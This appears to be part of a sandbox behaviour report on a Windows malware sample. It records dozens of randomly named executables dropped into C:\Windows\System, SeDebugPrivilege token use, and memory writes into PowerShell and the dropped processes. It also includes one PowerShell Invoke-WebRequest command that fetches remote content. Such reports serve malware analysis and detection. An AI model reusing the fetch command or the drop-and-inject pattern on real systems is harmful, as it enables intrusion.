File created C:\Windows\System\QHTRiAn.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\qQjOJjj.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\RshbCFF.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\PKAXYjt.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\EofqdTq.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\sEdECtK.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\OwfkyUr.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\eAHuVSM.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\nDgEDPz.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\faadoTJ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\bUxYqZC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\aITfxqm.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\utCwZko.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\OJJijMb.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\WLaJRGZ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\dmQyRlP.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\PsKWQhv.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\anuhQjX.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\yhNObML.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\rrxfTIN.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\BteTCsY.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\kmgsMlW.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\LMmgWNT.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Nsuwaki.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\bKaZkoj.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\TFeNSAS.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\QxxfsaC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\uNRjmaw.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Apzqzyv.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\hLBpzpB.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\FaLvxhX.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Bgsjsyk.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\aQyOFHf.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\wuKooHC.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Kqafkpe.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\oyzOSUi.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\Mrrbtou.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\frXCjNf.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\XOhvMoZ.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\CGKMmLg.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\OhTiKfH.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\AcAdqZs.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\NaAzdAR.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\dQwwxPM.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\QKELTyp.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\LGKvPFq.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
File created C:\Windows\System\ebrVwEM.exe C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4684 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4684 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4684 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\tCGPAkK.exe
PID 4684 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\tCGPAkK.exe
PID 4684 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\FaLvxhX.exe
PID 4684 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\FaLvxhX.exe
PID 4684 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\phzlgIG.exe
PID 4684 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\phzlgIG.exe
PID 4684 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\nbOglKf.exe
PID 4684 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\nbOglKf.exe
PID 4684 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\LvMWiuh.exe
PID 4684 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\LvMWiuh.exe
PID 4684 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\IGtJjFi.exe
PID 4684 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\IGtJjFi.exe
PID 4684 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\mEuCjTa.exe
PID 4684 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\mEuCjTa.exe
PID 4684 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\YDOJphm.exe
PID 4684 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\YDOJphm.exe
PID 4684 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\UYFLoDU.exe
PID 4684 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\UYFLoDU.exe
PID 4684 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\wdBZlNO.exe
PID 4684 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\wdBZlNO.exe
PID 4684 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EQRVuWV.exe
PID 4684 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EQRVuWV.exe
PID 4684 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\TFeNSAS.exe
PID 4684 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\TFeNSAS.exe
PID 4684 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\wuKooHC.exe
PID 4684 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\wuKooHC.exe
PID 4684 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OxDVdLa.exe
PID 4684 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OxDVdLa.exe
PID 4684 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\gsQEoSu.exe
PID 4684 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\gsQEoSu.exe
PID 4684 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\QHTRiAn.exe
PID 4684 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\QHTRiAn.exe
PID 4684 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\vcJWFZh.exe
PID 4684 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\vcJWFZh.exe
PID 4684 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\oqeHybi.exe
PID 4684 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\oqeHybi.exe
PID 4684 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OnEwCHM.exe
PID 4684 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OnEwCHM.exe
PID 4684 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ioWLjoA.exe
PID 4684 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ioWLjoA.exe
PID 4684 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ebBqHwr.exe
PID 4684 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ebBqHwr.exe
PID 4684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\Kqafkpe.exe
PID 4684 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\Kqafkpe.exe
PID 4684 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NFtAnYc.exe
PID 4684 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NFtAnYc.exe
PID 4684 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NWOpcOz.exe
PID 4684 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NWOpcOz.exe
PID 4684 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EPLJOjC.exe
PID 4684 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EPLJOjC.exe
PID 4684 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\boYNubX.exe
PID 4684 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\boYNubX.exe
PID 4684 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\DJpoIPh.exe
PID 4684 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\DJpoIPh.exe
PID 4684 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\vJepWnN.exe
PID 4684 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\vJepWnN.exe
PID 4684 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\KypvGBf.exe
PID 4684 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\KypvGBf.exe
PID 4684 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\GpUqJDb.exe
PID 4684 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\GpUqJDb.exe
PID 4684 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\buziPVp.exe
PID 4684 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\buziPVp.exe

Processes

C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\tCGPAkK.exe

C:\Windows\System\tCGPAkK.exe

C:\Windows\System\FaLvxhX.exe

C:\Windows\System\FaLvxhX.exe

C:\Windows\System\phzlgIG.exe

C:\Windows\System\phzlgIG.exe

C:\Windows\System\nbOglKf.exe

C:\Windows\System\nbOglKf.exe

C:\Windows\System\LvMWiuh.exe

C:\Windows\System\LvMWiuh.exe

C:\Windows\System\IGtJjFi.exe

C:\Windows\System\IGtJjFi.exe

C:\Windows\System\mEuCjTa.exe

C:\Windows\System\mEuCjTa.exe

C:\Windows\System\YDOJphm.exe

C:\Windows\System\YDOJphm.exe

C:\Windows\System\UYFLoDU.exe

C:\Windows\System\UYFLoDU.exe

C:\Windows\System\wdBZlNO.exe

C:\Windows\System\wdBZlNO.exe

C:\Windows\System\EQRVuWV.exe

C:\Windows\System\EQRVuWV.exe

C:\Windows\System\TFeNSAS.exe

C:\Windows\System\TFeNSAS.exe

C:\Windows\System\wuKooHC.exe

C:\Windows\System\wuKooHC.exe

C:\Windows\System\OxDVdLa.exe

C:\Windows\System\OxDVdLa.exe

C:\Windows\System\gsQEoSu.exe

C:\Windows\System\gsQEoSu.exe

C:\Windows\System\QHTRiAn.exe

C:\Windows\System\QHTRiAn.exe

C:\Windows\System\vcJWFZh.exe

C:\Windows\System\vcJWFZh.exe

C:\Windows\System\oqeHybi.exe

C:\Windows\System\oqeHybi.exe

C:\Windows\System\OnEwCHM.exe

C:\Windows\System\OnEwCHM.exe

C:\Windows\System\ioWLjoA.exe

C:\Windows\System\ioWLjoA.exe

C:\Windows\System\ebBqHwr.exe

C:\Windows\System\ebBqHwr.exe

C:\Windows\System\Kqafkpe.exe

C:\Windows\System\Kqafkpe.exe

C:\Windows\System\NFtAnYc.exe

C:\Windows\System\NFtAnYc.exe

C:\Windows\System\NWOpcOz.exe

C:\Windows\System\NWOpcOz.exe

C:\Windows\System\EPLJOjC.exe

C:\Windows\System\EPLJOjC.exe

C:\Windows\System\boYNubX.exe

C:\Windows\System\boYNubX.exe

C:\Windows\System\DJpoIPh.exe

C:\Windows\System\DJpoIPh.exe

C:\Windows\System\vJepWnN.exe

C:\Windows\System\vJepWnN.exe

C:\Windows\System\KypvGBf.exe

C:\Windows\System\KypvGBf.exe

C:\Windows\System\GpUqJDb.exe

C:\Windows\System\GpUqJDb.exe

C:\Windows\System\buziPVp.exe

C:\Windows\System\buziPVp.exe

C:\Windows\System\fgFosbz.exe

C:\Windows\System\fgFosbz.exe

C:\Windows\System\LiBAgXw.exe

C:\Windows\System\LiBAgXw.exe

C:\Windows\System\cbZcios.exe

C:\Windows\System\cbZcios.exe

C:\Windows\System\OWcqhIj.exe

C:\Windows\System\OWcqhIj.exe

C:\Windows\System\atvNpZp.exe

C:\Windows\System\atvNpZp.exe

C:\Windows\System\pbjFhFo.exe

C:\Windows\System\pbjFhFo.exe

C:\Windows\System\hWUcEEb.exe

C:\Windows\System\hWUcEEb.exe

C:\Windows\System\byBuVBz.exe

C:\Windows\System\byBuVBz.exe

C:\Windows\System\hyIYWaZ.exe

C:\Windows\System\hyIYWaZ.exe

C:\Windows\System\vMqkeoR.exe

C:\Windows\System\vMqkeoR.exe

C:\Windows\System\dAeQqte.exe

C:\Windows\System\dAeQqte.exe

C:\Windows\System\CnjarIV.exe

C:\Windows\System\CnjarIV.exe

C:\Windows\System\aulPfNz.exe

C:\Windows\System\aulPfNz.exe

C:\Windows\System\OwfkyUr.exe

C:\Windows\System\OwfkyUr.exe

C:\Windows\System\BCutflR.exe

C:\Windows\System\BCutflR.exe

C:\Windows\System\pnSdWLU.exe

C:\Windows\System\pnSdWLU.exe

C:\Windows\System\vZSRHTT.exe

C:\Windows\System\vZSRHTT.exe

C:\Windows\System\qsccTNJ.exe

C:\Windows\System\qsccTNJ.exe

C:\Windows\System\poWkzel.exe

C:\Windows\System\poWkzel.exe

C:\Windows\System\eSdqUtL.exe

C:\Windows\System\eSdqUtL.exe

C:\Windows\System\HIAbeRZ.exe

C:\Windows\System\HIAbeRZ.exe

C:\Windows\System\KoGbKpT.exe

C:\Windows\System\KoGbKpT.exe

C:\Windows\System\RqUNTsp.exe

C:\Windows\System\RqUNTsp.exe

C:\Windows\System\giwkzJQ.exe

C:\Windows\System\giwkzJQ.exe

C:\Windows\System\tCGIVLx.exe

C:\Windows\System\tCGIVLx.exe

C:\Windows\System\zIKzUps.exe

C:\Windows\System\zIKzUps.exe

C:\Windows\System\pUSNiRH.exe

C:\Windows\System\pUSNiRH.exe

C:\Windows\System\RtDZLmy.exe

C:\Windows\System\RtDZLmy.exe

C:\Windows\System\aLHhYRI.exe

C:\Windows\System\aLHhYRI.exe

C:\Windows\System\eMRIDXG.exe

C:\Windows\System\eMRIDXG.exe

C:\Windows\System\mATfyMu.exe

C:\Windows\System\mATfyMu.exe

C:\Windows\System\GKJVoXS.exe

C:\Windows\System\GKJVoXS.exe

C:\Windows\System\VwCqhQc.exe

C:\Windows\System\VwCqhQc.exe

C:\Windows\System\YwlGZZA.exe

C:\Windows\System\YwlGZZA.exe

C:\Windows\System\oeayPtO.exe

C:\Windows\System\oeayPtO.exe

C:\Windows\System\VCMUyHt.exe

C:\Windows\System\VCMUyHt.exe

C:\Windows\System\hVYuOTh.exe

C:\Windows\System\hVYuOTh.exe

C:\Windows\System\QbLtciT.exe

C:\Windows\System\QbLtciT.exe

C:\Windows\System\jfaFbNq.exe

C:\Windows\System\jfaFbNq.exe

C:\Windows\System\EVTJkfR.exe

C:\Windows\System\EVTJkfR.exe

C:\Windows\System\WBOzqCz.exe

C:\Windows\System\WBOzqCz.exe

C:\Windows\System\DOgemgl.exe

C:\Windows\System\DOgemgl.exe

C:\Windows\System\FmXexVD.exe

C:\Windows\System\FmXexVD.exe

C:\Windows\System\oHhLvQV.exe

C:\Windows\System\oHhLvQV.exe

C:\Windows\System\PsMwBie.exe

C:\Windows\System\PsMwBie.exe

C:\Windows\System\dvmOELR.exe

C:\Windows\System\dvmOELR.exe

C:\Windows\System\YxKbkmk.exe

C:\Windows\System\YxKbkmk.exe

C:\Windows\System\AjzRAYv.exe

C:\Windows\System\AjzRAYv.exe

C:\Windows\System\lRMzOlE.exe

C:\Windows\System\lRMzOlE.exe

C:\Windows\System\eUQSJRm.exe

C:\Windows\System\eUQSJRm.exe

C:\Windows\System\KtPBeGL.exe

C:\Windows\System\KtPBeGL.exe

C:\Windows\System\iVerEYm.exe

C:\Windows\System\iVerEYm.exe

C:\Windows\System\KPzZVJL.exe

C:\Windows\System\KPzZVJL.exe

C:\Windows\System\RUyfOiq.exe

C:\Windows\System\RUyfOiq.exe

C:\Windows\System\dpwpKQJ.exe

C:\Windows\System\dpwpKQJ.exe

C:\Windows\System\YRUtHgH.exe

C:\Windows\System\YRUtHgH.exe

C:\Windows\System\rkdkOGP.exe

C:\Windows\System\rkdkOGP.exe

C:\Windows\System\olrFMPA.exe

C:\Windows\System\olrFMPA.exe

C:\Windows\System\ENZBhBz.exe

C:\Windows\System\ENZBhBz.exe

C:\Windows\System\DkJNrNM.exe

C:\Windows\System\DkJNrNM.exe

C:\Windows\System\CPqCdiN.exe

C:\Windows\System\CPqCdiN.exe

C:\Windows\System\GdJHPRM.exe

C:\Windows\System\GdJHPRM.exe

C:\Windows\System\tstXUCK.exe

C:\Windows\System\tstXUCK.exe

C:\Windows\System\UsfImCJ.exe

C:\Windows\System\UsfImCJ.exe

C:\Windows\System\HxdAZWR.exe

C:\Windows\System\HxdAZWR.exe

C:\Windows\System\hTkEowz.exe

C:\Windows\System\hTkEowz.exe

C:\Windows\System\nToKUpI.exe

C:\Windows\System\nToKUpI.exe

C:\Windows\System\pHmUIQv.exe

C:\Windows\System\pHmUIQv.exe

C:\Windows\System\zGFkiaX.exe

C:\Windows\System\zGFkiaX.exe

C:\Windows\System\sEklvHO.exe

C:\Windows\System\sEklvHO.exe

C:\Windows\System\POoyLQj.exe

C:\Windows\System\POoyLQj.exe

C:\Windows\System\SUEQEzx.exe

C:\Windows\System\SUEQEzx.exe

C:\Windows\System\wYtkwXk.exe

C:\Windows\System\wYtkwXk.exe

C:\Windows\System\LaOpCPZ.exe

C:\Windows\System\LaOpCPZ.exe

C:\Windows\System\rTqFWhf.exe

C:\Windows\System\rTqFWhf.exe

C:\Windows\System\YoNFyUd.exe

C:\Windows\System\YoNFyUd.exe

C:\Windows\System\UehNspO.exe

C:\Windows\System\UehNspO.exe

C:\Windows\System\TznQudc.exe

C:\Windows\System\TznQudc.exe

C:\Windows\System\USPjIGK.exe

C:\Windows\System\USPjIGK.exe

C:\Windows\System\UVhfqVV.exe

C:\Windows\System\UVhfqVV.exe

